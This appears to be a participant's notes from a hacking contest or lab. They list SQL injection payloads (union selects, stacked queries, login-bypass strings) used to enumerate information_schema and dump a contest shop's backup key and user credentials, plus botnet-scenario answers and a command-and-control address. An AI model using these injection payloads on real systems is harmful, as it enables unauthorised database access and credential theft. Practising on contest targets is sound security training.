====== Hacking - Contest ====== ================================== SQL INJECTION ================================== select TABLE_NAME, TABLE_SCHEMA from information_schema.tables; select TABLE_NAME, COLUMN_NAME from information_schema.columns; select last_name, first_name from users union select 1,2; select last_name, first_name from users union select version(),user(); select * from users union select 1,2,3,4,5,6; select * from dvla.users union select TABLE_NAME, COLUMN_NAME, 1,2,3,4 from information_schema.columns; select first_name, last_name from dvwa.users where user_id = 1; username = "test' or 1 -- " password = "test" email address = "some@one.com" username = "a' or 1 and id<>1; -- # " Order number = 4 Name of first order = DDOSXXL db = dbm one table = bkeys Goto shop a'; select TABLE_NAME, TABLE_SCHEMA from information_schema.tables; a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; shows bkeys table has 2 columns - id and backup_key a'; select * from dbm.bkeys where id=1; shows backup_key = horsebatterystablecorrect a'; select 1, TABLE_NAME, TABLE_SCHEMA from information_schema.tables; shows db=cyber with one of its table = shop_users; a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; shows table shop_users with columns id, username, password, email, role a'; select * from cyber.shop_users; user = "ThisIsNotAFruit" password="b2n2n2" ssh admin@support.dbm.hl Killing this host...Great job. The key is: YOUROCK ================================== BOTNET ================================== PORT 1777 ROUTER 192.168.6.254 192.168.6.0/24 192.168.6.66 = COMMMAND and CONTROL CENTRE Bypass login How can I control the bots? Please enter your name as an Alantean Cyber Security Squad member: JanD How many drones does altantis have (https://news.atl) 2000 how many drones are there on the droneboard (Droneboard) 11 How many minutes does the UUV have to be submerged (https://atl-tech.atl) 10 How many minutes does it take for the UUV to transmit data to HQ? (atl-tech.atl) 10 What type of log can you see in the Admin Panel Menu (Admin panel and atl-tech,atl) access In what state does the autopilot have to be in order for the drones to submerge automatically? ON